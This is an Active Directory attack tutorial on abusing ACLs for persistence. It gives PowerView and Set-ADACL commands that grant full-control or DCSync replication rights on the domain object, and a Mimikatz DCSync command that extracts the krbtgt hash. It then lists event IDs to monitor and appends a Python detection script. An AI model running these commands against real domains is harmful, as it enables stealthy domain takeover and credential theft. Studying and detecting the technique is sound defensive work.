Abusing ACLs
With Domain Admin privileges, we can change the ACL rights of any user we choose in order to maintain persistence in a network.
Depending on which rights you change and on whom you change them, this can be a stealthy technique, provided that no code gets executed on the Domain Controller. One such method is to give a user replication rights and then use them to run DCSync and extract the krbtgt hash.
Useful Commands From Powershell
Give a User Full Control Rights over the Domain Object Itself
I should note this technique could be easily spotted...
# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights All -Verbose
# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -Verbose
Give a User Replication Rights
A much quieter technique than the above. It requires 3 rights to be given:
Replicating Directory Changes
Replicating Directory Changes All
Replicating Directory Changes in Filtered Set

# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights DCSync -Verbose
# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -GUIDRight DCSync -Verbose
You Can Then Run DCSync on Any User You Want Afterwards
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'
Mitigations
Monitor Security events:
4662 - Operations on objects
5136 - Modification of Objects
4670 - Changed Object Permissions
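To make the monitoring advice above concrete, here is an added Python triage routine (written for this page, not part of the original) that runs over constructed sample Security events. It flags 4662 events that request the three replication extended rights from a principal that is not a known DC, and 5136/4670 events that touch the security descriptor of the domain head. The KNOWN_DCS set, the sample events and the DOMAIN_DN value (taken from the commands above) are assumptions; the field names follow the EventData names of the real events, and the three GUIDs are the well-known extended-right GUIDs for the rights listed above.

```python
import re

# Extended-right GUIDs that together grant DCSync (the three rights listed above).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "Replicating Directory Changes in Filtered Set",
}
DOMAIN_DN = "DC=domain,DC=local"   # domain naming context, as used in the commands above
KNOWN_DCS = {"DC01$", "DC02$"}     # assumption: computer accounts of the legitimate DCs
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

def replication_guids(properties):
    """Return the DCSync-related GUIDs present in a 4662 'Properties' field, sorted."""
    found = set(GUID_RE.findall(properties.lower()))
    return sorted(found & REPLICATION_RIGHTS.keys())

def triage(event):
    """Return an alert string for one pre-parsed Security event, or None if it looks benign."""
    eid, who = event["EventID"], event["SubjectUserName"]
    if eid == 4662:
        guids = replication_guids(event.get("Properties", ""))
        # DCs replicate from each other constantly; any other principal asking for these rights is suspect.
        if guids and who not in KNOWN_DCS:
            return f"possible DCSync by {who}: " + ", ".join(REPLICATION_RIGHTS[g] for g in guids)
    elif eid == 5136:
        # A write to nTSecurityDescriptor on the domain head is what Add-ObjectAcl / Set-ADACL produce.
        if (event.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
                and event.get("ObjectDN", "").lower() == DOMAIN_DN.lower()):
            return f"ACL of {DOMAIN_DN} modified by {who}"
    elif eid == 4670 and event.get("ObjectName", "").lower() == DOMAIN_DN.lower():
        return f"permissions on {DOMAIN_DN} changed by {who}"
    return None

def triage_all(events):
    """Run triage over a list of events and keep only the alerts."""
    return [alert for alert in map(triage, events) if alert]

# Constructed sample events; the first is normal DC-to-DC replication and must not alert.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 5136, "SubjectUserName": "admin", "ObjectDN": "DC=domain,DC=local", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "SubjectUserName": "helpdesk", "ObjectDN": "CN=jdoe,CN=Users,DC=domain,DC=local", "AttributeLDAPDisplayName": "description"},
    {"EventID": 4670, "SubjectUserName": "admin", "ObjectName": "DC=domain,DC=local"},
]

if __name__ == "__main__":
    for alert in triage_all(SAMPLE_EVENTS):
        print(alert)
```

In practice the events would come from the Security log of each DC (for example via a SIEM export), and the ACL-change alerts should be correlated with the change-control record for the domain object.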